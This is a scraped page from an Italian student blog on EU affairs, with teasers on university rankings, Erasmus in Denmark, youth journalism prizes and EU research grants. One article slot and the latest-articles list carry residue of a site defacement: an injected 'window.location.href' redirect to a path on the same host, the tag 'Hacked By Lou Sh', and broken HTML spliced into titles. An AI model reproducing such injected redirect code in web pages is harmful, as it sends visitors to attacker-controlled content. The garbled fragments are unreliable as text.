EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Università

Università


Università

it

U-Multirank è l’innovativo sistema europeo che valuta le università con lo scopo non solo di offrire una classifica sempre aggiornata degli atenei, ma li esamina secondo determinati parametri. U-Multirank, progetto sostenuto dall’Ue attraverso 2 milioni di euro con una scadenza prevista per il 2015, consente di realizzare ricerche personalizzate a seconda delle esigenze informative di ogni utente e si focalizza sui pro e contro degli istituti di formazione.

Per il 2014, secondo il sito U-Multirank, solamente il 12% degli atenei analizzati offre un servizio idoneo classificabile come “Very Good”. In vetta alla classifica compare per l’Italia il Politecnico di Torino insieme all’MIT, Harvard e Berkeley.

Ma come si utilizza il sito? Si parte con delle (...)

it

Quali furono i principi alla base della nascita del popolarismo europeo? Cosa rimane oggi dell’idea di Partito popolare e di popolarismo così come l’avevano teorizzata i padri ideatori? Come questa prospettiva ha contribuito alla formazione dell’idea di un’Europa unita? Come poter recuperare e adattare ai nostri giorni quei principi che ispirarono Sturzo e De Gasperi?

Dare una risposta a questi e molti altri interrogativi è stato lo scopo del seminario di formazione “People’s Parties in Europe: principles and perspectives” organizzato dalla Fondazione De Gasperi in collaborazione con il CES, Centre for European Studies, e il Centro di Eccellenza Jean Monnet (...)

it

Quella in cui viviamo tutti i giorni è una società interconnessa, in cui sempre più persone, di qualunque fascia di età, si avvalgono dell’uso di tecnologie. Tuttavia, soprattutto per i più piccoli, è evidente come il mondo scolastico non rifletta esattamente questa realtà.

Nei paesi dell’UE oltre il 60% dei bambini frequentano scuole e istituti non ancora dotati di tecnologia digitale. La scuola non fornisce sistemi di lettura digitale, software di esercizi, simulazioni o giochi didattici. Soltanto la metà dei giovani di 16 anni frequenta ‘istituti digitalizzati’ e (...)

it

Raramente ci si annoia durante le lezioni in Danimarca. Puoi lavorare a maglia o preparare una spremuta d'arancia. L'importante è garantire il 75% delle presenze e saper fare più attività insieme. Una delle quali quasi obbligatoria: partecipare in aula. Niente di strano se lo si fa sferruzzando un cappellino!

Continuamente stimolati alla discussione, capita spesso che gli studenti danesi a lezione parlino più dell’insegnante. Abituati agli interventi in pubblico e ai lavori di gruppo, interagiscono disinvolti tra loro e con i docenti mantenendo dinamico l’apprendimento e alto il livello di (...)

it

La partenza e l'arrivo: il primo impatto con un'avventura chiamata Erasmus.

Il mio primo giorno in Danimarca lo ricordo seduta su una panchina mangiando insalata. Niente di meno indicato per il pranzo al sacco in una domenica danese di fine gennaio. Aveva nevicato tutto il giorno, continuava a nevicare sulla mia insalata e avrebbe proseguito per i due mesi successivi. (...)

it

L'European Youth Media Days 2013, evento realizzato in collaborazione tra l’Europarlamento e l’European Youth Press, si concentrerà su temi di attualità dell’Unione europea e in particolare sulle elezioni europee del maggio 2014.

Un messaggio, una poesia, un libro, un articolo: scrivere. È il sogno di milioni di ragazzi aspiranti giornalisti che trovano nella scrittura un modo per manifestare il proprio pensiero.

È per questo che il Parlamento europeo invita giovani giornalisti e aspiranti tali a partecipare all’European (...)

it

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

it

Facilitare la libera circolazione di idee, favorire lo scambio interculturale: questo è la volontà dell'UE, rendere il Vecchio continente parte del mondo, libero dalle costrizioni burocratiche.

La proposta è stata avanzata dalla commissaria europea Cecilia Malmström, la quale il 25 marzo scorso, accompagnata dai ricercatori ospiti dell’UE, Fatma Abdi e Bellarminus Kakpovi, ha esposto i vantaggi di una apertura di mentalità da parte dei paesi dell’UE. Un’apertura che deve riguardare in (...)

it

Dopo il successo dell’edizione passata, la Rappresentanza italiana della Commissione europea, in collaborazione con l’Associazione Giornalisti Scuola di Perugia e con il patrocinio del Consiglio nazionale dell’Ordine dei giornalisti, torna a premiare il talento dei giovani europei. Sono aperte infatti le candidature per l’edizione 2013 del “Premio per i giovani giornalisti iscritti alle Scuole di giornalismo”.

Sensibilizzare i giovani giornalisti ai temi di rilevanza europea così da ottenere, nel minor tempo possibile, una completa copertura giornalistica dei suddetti e un coinvolgimento maggiore della popolazione - anche in relazione all’Anno europeo dei cittadini (2013) - è l’intento che la (...)

it

Gli interessati hanno tempo fino al 14 agosto 2013 per presentare la loro richiesta. Il numero dei partecipanti è abbastanza esiguo come era lecito attendersi: saranno solo 1000 i ricercatori che avranno l'opportunità di sfruttare l'ingente sovvenzione fornita dall'Unione europea. Oltre a questo, la Commissione ha specificato che continuerà ad offrire comunque borse di studio individuali nell'ambito delle nuove azioni Marie Skłodowska-Curie, inserite nel programma Horizon 2020, che vedrà la luce il prossimo anno, il 2014.

Le "Azioni Marie Curie" sono delle sovvenzioni istituite già da qualche anno che mirano ad ampliare e specificare i percorsi di screening dei ricercatori. Le cifre promosse dall’attività sono molto consistenti, anche se mai come questa volta la Commissione si era spinta tanto oltre: dal 2007 al (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France